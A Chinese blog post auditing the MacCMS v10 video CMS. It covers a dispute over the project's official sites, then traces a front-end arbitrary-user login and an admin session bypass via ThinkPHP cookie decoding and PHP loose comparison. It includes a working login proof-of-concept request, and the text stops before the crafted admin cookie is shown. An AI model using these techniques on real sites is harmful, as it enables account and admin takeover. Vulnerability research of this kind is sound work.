

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/icon.png">
  <link rel="icon" href="/img/icon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="jelly">
  <meta name="keywords" content="">
  
  <title>MacCMS 实战审计 - jelly&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":"14de5c0cf6db6044f06b32ef50694a98","google":"G-1S553HH16G","gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Jelly's blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/doll.webp') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="MacCMS 实战审计">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-11-15 14:55" pubdate>
        2021年11月15日 下午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      7.2k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      91
       分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">MacCMS 实战审计</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：6 分钟前
                
              </p>
            
            <div class="markdown-body">
              <h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>MacCMS 是一套快速视频内容管理开源 cms 系统。据说 MacCMS 已经发展了 12 年，现在流行的两个版本是v10和v8，本次主要审计 v10 的代码</p>
<h2 id="真假-MacCMS"><a href="#真假-MacCMS" class="headerlink" title="真假 MacCMS"></a>真假 MacCMS</h2><p>MacCMS 目前有两个自称官方的网站，maccms.pro 和 maccms.la，感觉两个都拿不出绝对的证据证明自己是官方网站。目前只能说下最可能的情况：</p>
<p>MacCMS 作者据说是一个叫做老王的程序员（原名王波），使用昵称为甜甜，在开发 MacCMS 期间，一直使用的域名是 maccms.com。在 2019 年 MacCMS 被用于构建非法网站的原因，官方 maccms.com 域名在2019年5月左右关闭</p>
<p>maccms.la 的 github 账号为 magicblack，于 2016 加入 github 仓库，在 2019 年 7 月 8 日创建了 MacCMS v8 和 v10 的仓库，最新发布的 v10 为 v2022.1000.3005（2021.8.18）</p>
<p>按照 magicblack 的说法，2021年6月，maccms.com 域名被盗取，转移到了境外。现在 maccms.com 会被解析到 maccms.pro 域名上</p>
<p>maccms.pro 的 github 账号为 maccmspro ，于 2021 年 6.4 日加入 github 仓库，只记录有 v10 2021.1000.2000 版，一直在小步更新，最近更新时间是2021年7月29日。另外 maccmspro 在建立时就做好了计划要推出全新的版本。maccmspro 在官网上的一篇博客声明自己并不是原版 MacCMS 的作者老王，maccmspro 的意思就是看不下 magicblack 这种发布盗版代码甚至在代码中种马的行为，于是决定自己替老王维护 MacCMS 程序</p>
<img src="img/maccms/image-20211105105811104.png" srcset="/img/loading.gif" lazyload alt="image-20211105105811104" style="zoom:50%;" />

<p>从这里其实能感受到 maccmspro 最本质的目的就是为了蹭原版 MacCMS 的热度，想做 MacCMS 的新官方平台，并逐步成为新版 MacCMS</p>
<p>maccmspro 在 github 似乎出现过一个乌龙，挺尴尬的，如下图，但此图真实性不确定</p>
<img src="img/maccms/1624932983-f1feef31751c05e.jpeg" srcset="/img/loading.gif" lazyload alt="1624932983-f1feef31751c05e" style="zoom:50%;" />

<p>另外也有一个域名 maccms.cn ，自称是 MacCMS 爱好者，和 maccms.la 网站的 UI 一模一样 ，却指出 maccms.la 是假冒域名，并指出官方域名为 maccms.pro</p>
<p>下面是我找到的一张 MacCMS 早期 maccms.com 的首页图，maccms.la 和 maccms.cn 现在就是这样的 UI </p>
<img src="img/maccms/2019033114563412.png" srcset="/img/loading.gif" lazyload style="zoom:50%;" />

<p>从有记录的时间上来看，magicblack 维护了 MacCMS 的代码有接近两年的时间，maccmspro 维护代码的时间只有 5个月，magicblack 在 github 上的点赞和 maccms.la 域名搜索排名上都要领先于 maccmspro。不过 maccmspro 凭借强大的营销，也算是站住了脚。目前看来 maccmspro 确定是一个想借用原版 MacCMS 名声打造新 MacCMS 的平台，剩下的问题就是 magicblack 是否是原版</p>
<p>我有找到苹果cms的百度贴吧，最早的消息能追溯到2017年，吧主名字也为 magicblack，这个 id 可以在很多博客网站上找到，从多方信息来看，magicblack 似乎是老王本人，种种迹象也表明 magicblack 似乎就是原版，但下面 magicblack 做的两件事也容易让人产生怀疑：</p>
<p>1）在 maccms.com 关闭后，magicblack 才在 github 上提交代码，无法证明在原官方正版存在时 magicblack 现官方平台做出了重大更新</p>
<p>2）magicblack 存在争议较大的文件：static/js/player.js，在 magicblack 中该文件的代码一直加密的，这段代码有引流、加载广告的嫌疑。maccmspro 声称解密了该代码，并利用这个把柄称 magicblack 在种木马，从而为自己赢得了不少信任</p>
<p>关于 magicblack 和 maccmspro 的瓜参考如下信息：</p>
<p>​        <a target="_blank" rel="noopener" href="https://www.maccms.la/">https://www.maccms.la/</a></p>
<p>​        <a target="_blank" rel="noopener" href="https://www.zhihu.com/question/469030135">https://www.zhihu.com/question/469030135</a></p>
<p>​        <a target="_blank" rel="noopener" href="https://tieba.baidu.com/p/7425108612">https://tieba.baidu.com/p/7425108612</a></p>
<p>​        <a target="_blank" rel="noopener" href="https://www.xunaonao.com/15058.html">https://www.xunaonao.com/15058.html</a></p>
<p>吃瓜最后，无论谁是 MacCMS 的正版维护者，能吸取的教训就是要好好维护自己的知识产权，同时也不要辜负用户的信任，做一些奇怪的操作，毕竟对广大的使用者来说，好用才是使用的唯一标准</p>
<h2 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h2><p>代码在 magicblack 或 maccmspro 的 github 仓库下载就可以了，虽然不知道这两家谁是正版，但目前两者的代码是差不多的，如果要区分两家的代码，有下面两种方法</p>
<p>1）区分 static/js/player.js 页面</p>
<p>maccmspro 和 magicblack 的 player.js 区别明显，可以在github上找相关源码对比细节，不过github上两者在代码版本标签上都没有打的很明显，该方法可能不够精准</p>
<p>2）后台查看跳转</p>
<p>在后台点击左上角图标就会跳转到对应网站，是谁就一清二楚了</p>
<img src="img/maccms/image-20211105144250109.png" srcset="/img/loading.gif" lazyload alt="image-20211105144250109" style="zoom:50%;" />

<p>【安装主题】</p>
<p>我下载的代码前台是没有模板文件的，这会影响对前台功能代码的审计。网上随便找套主题即可，这里贴一个好心人提供的模板：<a target="_blank" rel="noopener" href="https://www.lanzoux.com/s/pgcms%EF%BC%8C%E6%8D%AE%E8%AF%B4">https://www.lanzoux.com/s/pgcms，据说</a> maccms 站长用海螺模板的较多，可以优先选这个</p>
<h1 id="前台任意用户登陆"><a href="#前台任意用户登陆" class="headerlink" title="前台任意用户登陆"></a>前台任意用户登陆</h1><h2 id="代码分析"><a href="#代码分析" class="headerlink" title="代码分析"></a>代码分析</h2><p>用户登陆的关键代码如下（只审计了最新的 v2022.1000.3024 版）：</p>
<ul>
<li>可以看到有两种登陆验证方式，第一种是常见的用户名密码</li>
<li>第二种验证方式转换成sql语句的where字段就是 <code>where $data[&#39;col&#39;]=$data[&#39;openid&#39;]</code>，而两边的参数都是可控的，所以这里很好通过验证</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">//	application/common/model/User.php</span><br><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">login</span>(<span class="hljs-params"><span class="hljs-variable">$param</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-variable">$data</span> = [];<br>    <span class="hljs-variable">$data</span>[<span class="hljs-string">&#x27;user_name&#x27;</span>] = htmlspecialchars(urldecode(trim(<span class="hljs-variable">$param</span>[<span class="hljs-string">&#x27;user_name&#x27;</span>])));<br>    <span class="hljs-variable">$data</span>[<span class="hljs-string">&#x27;user_pwd&#x27;</span>] = htmlspecialchars(urldecode(trim(<span class="hljs-variable">$param</span>[<span class="hljs-string">&#x27;user_pwd&#x27;</span>])));<br>    <span class="hljs-variable">$data</span>[<span class="hljs-string">&#x27;verify&#x27;</span>] = <span class="hljs-variable">$param</span>[<span class="hljs-string">&#x27;verify&#x27;</span>];<br>    <span class="hljs-variable">$data</span>[<span class="hljs-string">&#x27;openid&#x27;</span>] = htmlspecialchars(urldecode(trim(<span class="hljs-variable">$param</span>[<span class="hljs-string">&#x27;openid&#x27;</span>])));<br>    <span class="hljs-variable">$data</span>[<span class="hljs-string">&#x27;col&#x27;</span>] = htmlspecialchars(urldecode(trim(<span class="hljs-variable">$param</span>[<span class="hljs-string">&#x27;col&#x27;</span>])));<br><br>    <span class="hljs-keyword">if</span> (<span class="hljs-keyword">empty</span>(<span class="hljs-variable">$data</span>[<span class="hljs-string">&#x27;openid&#x27;</span>])) &#123;<br>        <span class="hljs-comment">// 验证用户名密码	……</span><br>    &#125; <span class="hljs-keyword">else</span> &#123;<br>        <span class="hljs-keyword">if</span> (<span class="hljs-keyword">empty</span>(<span class="hljs-variable">$data</span>[<span class="hljs-string">&#x27;openid&#x27;</span>]) || <span class="hljs-keyword">empty</span>(<span class="hljs-variable">$data</span>[<span class="hljs-string">&#x27;col&#x27;</span>])) &#123;<br>            <span class="hljs-keyword">return</span> [<span class="hljs-string">&#x27;code&#x27;</span> =&gt; <span class="hljs-number">1001</span>, <span class="hljs-string">&#x27;msg&#x27;</span> =&gt; lang(<span class="hljs-string">&#x27;model/user/input_require&#x27;</span>)];<br>        &#125;<br>      	<span class="hljs-comment">// 第二种验证</span><br>        <span class="hljs-variable">$where</span>[<span class="hljs-variable">$data</span>[<span class="hljs-string">&#x27;col&#x27;</span>]] = <span class="hljs-variable">$data</span>[<span class="hljs-string">&#x27;openid&#x27;</span>];<br>    &#125;<br>    <span class="hljs-variable">$where</span>[<span class="hljs-string">&#x27;user_status&#x27;</span>] = [<span class="hljs-string">&#x27;eq&#x27;</span>, <span class="hljs-number">1</span>];<br>    <span class="hljs-variable">$row</span> = <span class="hljs-keyword">$this</span>-&gt;where(<span class="hljs-variable">$where</span>)-&gt;find();<br>		……<br>&#125;<br></code></pre></td></tr></table></figure>

<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>构造 <code>where $data[&#39;col&#39;]=$data[&#39;openid&#39;]</code> ，在数据库的 user 表中，user_id 是最清楚的，直接构造 <code>user_id=xxx</code> 就可以实现任意用户登陆</p>
<p>poc：openid为任意用户id</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">POST /<span class="hljs-keyword">index</span>.php/<span class="hljs-keyword">user</span>/<span class="hljs-keyword">login</span><br><br>openid=<span class="hljs-number">1</span>&amp;col=user_id<br></code></pre></td></tr></table></figure>

<p>发送 poc 后会显示登陆成功，此时浏览器已经获取了登陆后的cookie，然后直接访问前台就好了</p>
<img src="img/maccms/image-20211112113955797.png" srcset="/img/loading.gif" lazyload alt="image-20211112113955797" style="zoom:50%;" />

<p>登陆成功</p>
<img src="img/maccms/image-20211112115100091.png" srcset="/img/loading.gif" lazyload alt="image-20211112115100091" style="zoom:50%;" />

<h1 id="绕过后台会话验证"><a href="#绕过后台会话验证" class="headerlink" title="绕过后台会话验证"></a>绕过后台会话验证</h1><p>在早些 MacCMS 版本中，后台会话认证的数据全部来自客户端的 cookie ，该参数可控，可以结合 TP5 的一些特性绕过后台的会话认证，从而登陆后台</p>
<h2 id="代码分析-1"><a href="#代码分析-1" class="headerlink" title="代码分析"></a>代码分析</h2><p>MacCMS 的后台控制器类都会继承 <code>app\admin\controller\Base</code> 类，该类的构造方法中会调用 <code>checkLogin()</code> 对用户的身份做验证</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">//	application/admin/controller/Base.php</span><br><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function"></span>&#123;<br>    ……<br>        <span class="hljs-variable">$res</span> = model(<span class="hljs-string">&#x27;Admin&#x27;</span>)-&gt;checkLogin();<br>    		……	<br></code></pre></td></tr></table></figure>

<p><code>checkLogin()</code> 对应代码如下：</p>
<ul>
<li><code>$admin_id，$admin_name，$admin_check</code> 来自客户端 cookie，通过 TP5 的 <code>cookie 助手函数</code>获取，所以这三个变量是可控的，同时该漏洞还需要理解 TP5 的 cookie 助手函数，后面会详细分析该函数的代码</li>
<li><code>$admin_id，$admin_name，$admin_check</code> 都不能为空，这里就会限制很多弱类型比较的参数</li>
<li><code>$admin_id，$admin_name</code> 会赋值到 <code>$where</code> 上，==这里是直接赋值上去的，写法是不严谨的，也是造成该漏洞的关键因素之一==。这两个参数值最终会用于查询 admin 表的数据，查询结果赋值到 <code>$info</code>。这里 <code>$info</code> 不能为空。这是后台的第一个验证条件，就是在 admin 表中存在 <code>$admin_id，$admin_name</code> 的数据，这里的条件是比较好绕过的，后面会将详细构造</li>
<li><code>$login_check</code> 是一段 md5() 加密值，其中加密参数 <code>$info[&#39;admin_random&#39;]</code> 是未知的。第二个验证条件便是 <code>$login_check</code> 和 <code>$admin_check</code> 弱类型相等，在没有 <code>$info[&#39;admin_random&#39;]</code> 的情况下，没法构造相等的 md5 值，在 <code>$login_check</code> 固定为一个 md5 字符串的情况时， 根据 PHP 的弱类型比较，==<code>$admin_check</code> 需要传入bool类型 <code>true</code> 或整数类型 <code>0</code>，而TP5 的 <code>cookie 助手函数</code>获取的 cookie 确实存在这样的机会==，下面来看看该助手函数的详细代码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">//	application/common/model/Admin.php</span><br><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">checkLogin</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-variable">$admin_id</span> = cookie(<span class="hljs-string">&#x27;admin_id&#x27;</span>);<br>    <span class="hljs-variable">$admin_name</span> = cookie(<span class="hljs-string">&#x27;admin_name&#x27;</span>);<br>    <span class="hljs-variable">$admin_check</span> = cookie(<span class="hljs-string">&#x27;admin_check&#x27;</span>);<br><br>    <span class="hljs-keyword">if</span>(<span class="hljs-keyword">empty</span>(<span class="hljs-variable">$admin_id</span>) || <span class="hljs-keyword">empty</span>(<span class="hljs-variable">$admin_name</span>) || <span class="hljs-keyword">empty</span>(<span class="hljs-variable">$admin_check</span>))&#123;<br>        <span class="hljs-keyword">return</span> [<span class="hljs-string">&#x27;code&#x27;</span>=&gt;<span class="hljs-number">1001</span>, <span class="hljs-string">&#x27;msg&#x27;</span>=&gt;<span class="hljs-string">&#x27;未登录&#x27;</span>];<br>    &#125;<br><br>    <span class="hljs-variable">$where</span> = [];<br>    <span class="hljs-variable">$where</span>[<span class="hljs-string">&#x27;admin_id&#x27;</span>] = <span class="hljs-variable">$admin_id</span>;<br>    <span class="hljs-variable">$where</span>[<span class="hljs-string">&#x27;admin_name&#x27;</span>] = <span class="hljs-variable">$admin_name</span>;<br>    <span class="hljs-variable">$where</span>[<span class="hljs-string">&#x27;admin_status&#x27;</span>] =<span class="hljs-number">1</span> ;<br><br>    <span class="hljs-variable">$info</span> = <span class="hljs-keyword">$this</span>-&gt;where(<span class="hljs-variable">$where</span>)-&gt;find();<br>    <span class="hljs-keyword">if</span>(<span class="hljs-keyword">empty</span>(<span class="hljs-variable">$info</span>))&#123;<br>        <span class="hljs-keyword">return</span> [<span class="hljs-string">&#x27;code&#x27;</span>=&gt;<span class="hljs-number">1002</span>,<span class="hljs-string">&#x27;msg&#x27;</span>=&gt;<span class="hljs-string">&#x27;未登录&#x27;</span>];<br>    &#125;<br>    <span class="hljs-variable">$info</span> = <span class="hljs-variable">$info</span>-&gt;toArray();<br><br>    <span class="hljs-variable">$login_check</span> = md5(<span class="hljs-variable">$info</span>[<span class="hljs-string">&#x27;admin_random&#x27;</span>] . <span class="hljs-variable">$info</span>[<span class="hljs-string">&#x27;admin_name&#x27;</span>] .<span class="hljs-variable">$info</span>[<span class="hljs-string">&#x27;admin_id&#x27;</span>]) ;<br>    <span class="hljs-keyword">if</span>(<span class="hljs-variable">$login_check</span> != <span class="hljs-variable">$admin_check</span>)&#123;<br>        <span class="hljs-keyword">return</span> [<span class="hljs-string">&#x27;code&#x27;</span>=&gt;<span class="hljs-number">1003</span>,<span class="hljs-string">&#x27;msg&#x27;</span>=&gt;<span class="hljs-string">&#x27;未登录&#x27;</span>];<br>    &#125;<br>    <span class="hljs-keyword">return</span> [<span class="hljs-string">&#x27;code&#x27;</span>=&gt;<span class="hljs-number">1</span>,<span class="hljs-string">&#x27;msg&#x27;</span>=&gt;<span class="hljs-string">&#x27;已登录&#x27;</span>,<span class="hljs-string">&#x27;info&#x27;</span>=&gt;<span class="hljs-variable">$info</span>];<br>&#125;<br></code></pre></td></tr></table></figure>

<p> <code>cookie 助手函数</code>将会调用 <code>\think\Cookie</code> 类的 <code>get</code> 方法获取客户端传来的 cookie 值，代码如下：</p>
<ul>
<li><code> $name</code> 是传入 get() 方法的参数，就是上面的 admin_id、admin_name、admin_check</li>
<li><code>$value</code> 就是 cookie 中的参数值，注意到这里还有个判断，如果 <code>$value</code> 是以 <code>think:</code> 开头的字符串，其  <code>think:</code> 后面的字符串又会经过 <code>json_decode()</code> 和 <code>\think\Cookie::jsonFormatProtect()</code> 的处理<ul>
<li>这里便是关键了，看了下php manual，<code>json_deode()</code> 在遇到 <code>true</code>, <code>false</code> 和 <code>null</code> 会相应地返回 <strong><code>true</code></strong>, <strong><code>false</code></strong> 和 **<code>null</code>**，而 bool 类型的 true 就是我们一直期待的</li>
<li><code>json_decode()</code> 会使 <code>$value</code> 获取到 bool 类型的 <strong>true</strong> 值，然后又会经过 <code>think\Cookie::jsonFormatProtect()</code> 处理，查看其代码，<code>$value</code> 为 <strong>true</strong> 时并不会被处理，所以我们构造的 <strong>true</strong> 活了下来</li>
</ul>
</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">//	thinkphp/library/think/Cookie.php</span><br><span class="hljs-keyword">public</span> <span class="hljs-built_in">static</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">get</span>(<span class="hljs-params"><span class="hljs-variable">$name</span> = <span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$prefix</span> = <span class="hljs-literal">null</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>		<span class="hljs-variable">$prefix</span> = !is_null(<span class="hljs-variable">$prefix</span>) ? <span class="hljs-variable">$prefix</span> : <span class="hljs-built_in">self</span>::<span class="hljs-variable">$config</span>[<span class="hljs-string">&#x27;prefix&#x27;</span>];<br>    <span class="hljs-variable">$key</span>    = <span class="hljs-variable">$prefix</span> . <span class="hljs-variable">$name</span>;<br>    <span class="hljs-keyword">if</span> (<span class="hljs-string">&#x27;&#x27;</span> == <span class="hljs-variable">$name</span>) &#123;……    &#125; <span class="hljs-keyword">elseif</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_COOKIE</span>[<span class="hljs-variable">$key</span>])) &#123;<br>        <span class="hljs-variable">$value</span> = <span class="hljs-variable">$_COOKIE</span>[<span class="hljs-variable">$key</span>];<br><br>        <span class="hljs-keyword">if</span> (<span class="hljs-number">0</span> === strpos(<span class="hljs-variable">$value</span>, <span class="hljs-string">&#x27;think:&#x27;</span>)) &#123;<br>            <span class="hljs-variable">$value</span> = json_decode(substr(<span class="hljs-variable">$value</span>, <span class="hljs-number">6</span>), <span class="hljs-literal">true</span>);<br>            array_walk_recursive(<span class="hljs-variable">$value</span>, <span class="hljs-string">&#x27;self::jsonFormatProtect&#x27;</span>, <span class="hljs-string">&#x27;decode&#x27;</span>);<br>        &#125;<br>    &#125; <span class="hljs-keyword">else</span> &#123;<br>        <span class="hljs-variable">$value</span> = <span class="hljs-literal">null</span>;<br>    &#125;<br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$value</span>;<br>&#125;<br><span class="hljs-keyword">protected</span> <span class="hljs-built_in">static</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">jsonFormatProtect</span>(<span class="hljs-params">&amp;<span class="hljs-variable">$val</span>, <span class="hljs-variable">$key</span>, <span class="hljs-variable">$type</span> = <span class="hljs-string">&#x27;encode&#x27;</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-keyword">if</span> (!<span class="hljs-keyword">empty</span>(<span class="hljs-variable">$val</span>) &amp;&amp; <span class="hljs-literal">true</span> !== <span class="hljs-variable">$val</span>) &#123;<br>        <span class="hljs-variable">$val</span> = <span class="hljs-string">&#x27;decode&#x27;</span> == <span class="hljs-variable">$type</span> ? urldecode(<span class="hljs-variable">$val</span>) : urlencode(<span class="hljs-variable">$val</span>);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<h2 id="漏洞利用-1"><a href="#漏洞利用-1" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>通过分析代码，绕过后台验证有两个判断条件，传入的可控参数是 <code>$admin_id，$admin_name，$admin_check</code></p>
<p>1）条件1，能从数据库中查询到 admin_id，admin_name 的用户</p>
<p>该条件需要保证 admin 表中存在 <code>$admin_id，$admin_name</code> 这样的值，即存在这样的管理员id，管理员用户名</p>
<p>一般管理员id为1，账号为admin，这个概率还是很大的。不过这里也可以利用 TP5 的一个特性，可以传入如下的值：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$where</span>[<span class="hljs-string">&#x27;admin_id&#x27;</span>] = [<span class="hljs-string">&#x27;like&#x27;</span>,<span class="hljs-string">&#x27;%&#x27;</span>];<br><span class="hljs-variable">$where</span>[<span class="hljs-string">&#x27;admin_name&#x27;</span>] = [<span class="hljs-string">&#x27;like&#x27;</span>,<span class="hljs-string">&#x27;%&#x27;</span>];<br><span class="hljs-variable">$info</span> = <span class="hljs-keyword">$this</span>-&gt;where(<span class="hljs-variable">$where</span>)-&gt;find();<br></code></pre></td></tr></table></figure>

<p>此时执行的sql语句为：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">SELECT</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">FROM</span> `mac_admin` <span class="hljs-keyword">WHERE</span>  `admin_id` <span class="hljs-keyword">LIKE</span> <span class="hljs-string">&#x27;%&#x27;</span>  <span class="hljs-keyword">AND</span> `admin_name` <span class="hljs-keyword">LIKE</span> <span class="hljs-string">&#x27;%&#x27;</span>  <span class="hljs-keyword">AND</span> `admin_status` <span class="hljs-operator">=</span> <span class="hljs-number">1</span> LIMIT <span class="hljs-number">1</span><br></code></pre></td></tr></table></figure>

<p>此时构造的cookie应该为：</p>
